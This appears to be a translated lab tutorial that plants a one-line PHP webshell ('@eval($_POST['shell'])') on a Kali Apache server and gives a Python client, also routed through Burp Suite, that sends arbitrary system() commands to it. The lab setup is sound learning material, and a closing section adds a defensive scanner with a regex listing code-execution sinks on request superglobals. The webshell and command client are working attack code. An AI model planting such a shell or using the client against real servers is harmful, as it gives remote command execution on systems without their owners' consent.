Kali already ships with Apache; running ls under /etc shows its directory, so it only needs to be configured. (Any other Linux or Windows virtual machine can be used here instead.)
Commands for managing the Apache service:
/etc/init.d/apache2 start (start)
/etc/init.d/apache2 restart (restart)
/etc/init.d/apache2 status (check the status)
On Kali, browse to Kali's own IP address; the page shows that Apache has been started.
Write a one-line webshell (a "one-sentence Trojan") in the web root directory on Kali. A PHP webshell is used here.
<?php @eval($_POST['shell']);?>
The shell variable receives the string sent by the Python code.
The eval() function executes the received string as PHP code.
import requests

url = str(input('Target URL: '))
passwd = str(input('Connection password: '))  # actually the name of the variable in the webshell (shell)
cmd = str(input('Command to run: '))

# Pass the command to the one-line webshell
payload = {
    passwd: "system(\'" + cmd + "\');"
}

# Send a POST request to the target URL
response = requests.post(url=url, data=payload, timeout=3)

# Echo the result of the command execution
print(response.text)
The same script, with the request routed through Burp Suite so that the POST can be captured:
import requests

url = str(input('Target URL: '))
passwd = str(input('Connection password: '))  # actually the name of the variable in the webshell (shell)
cmd = str(input('Command to run: '))

# Pass the command to the one-line webshell
payload = {
    passwd: "system(\'" + cmd + "\');"
}

# Use Burp Suite to capture the POST request sent by Python
proxy = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

# Send a POST request to the target URL
response = requests.post(url=url, data=payload, proxies=proxy, timeout=3)

# Echo the result of the command execution
print(response.text)
Turn on interception in Burp Suite and run the Python code.
Replay this POST request.
Decode the request with Burp Suite's built-in decoder.
After decoding, the result is as follows.
After changing the ls command to the ifconfig command, the result is as follows.
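Seen from the defender's side, the one-line webshell above has a recognizable shape: a code-executing PHP function called directly on a request superglobal. The following is an added example, not code from the original post, that scans a web root for that direct form; the function names, the list of sink functions and the sample files are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# PHP constructs that execute code or OS commands.
SINKS = r"(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)"
# Request superglobals that carry client-supplied data.
SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE)"
# A sink call whose argument contains a superglobal lookup; tolerates the @
# error-suppression prefix, mixed case and extra whitespace.
PATTERN = re.compile(rf"@?\b{SINKS}\s*\([^;]*?{SOURCES}\s*\[", re.IGNORECASE)


def find_shell_lines(source):
    """Return (line_number, stripped_line) for every line matching PATTERN."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        if PATTERN.search(line):
            hits.append((number, line.strip()))
    return hits


def scan_webroot(root, suffixes=(".php", ".phtml", ".inc")):
    """Walk root and map each suspicious file path to its matching lines."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_shell_lines(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed sample files: the shell from this page, a spaced-out variant,
# and an ordinary form handler that must not be flagged.
SAMPLES = {
    "shell.php": "<?php @eval($_POST['shell']);?>",
    "spaced.php": "<?php\n  ASSERT ( $_REQUEST[\"k\"] );\n",
    "form.php": "<?php\n$name = htmlspecialchars($_POST['name']);\necho $name;\n",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, find_shell_lines(src))
    # On a real server, point scan_webroot at the document root
    # (assumed here to be the Debian/Kali default, /var/www/html).
    print(scan_webroot("/var/www/html"))
```

A match is a lead for review, not proof; this pattern only covers the direct sink-on-superglobal form shown on this page.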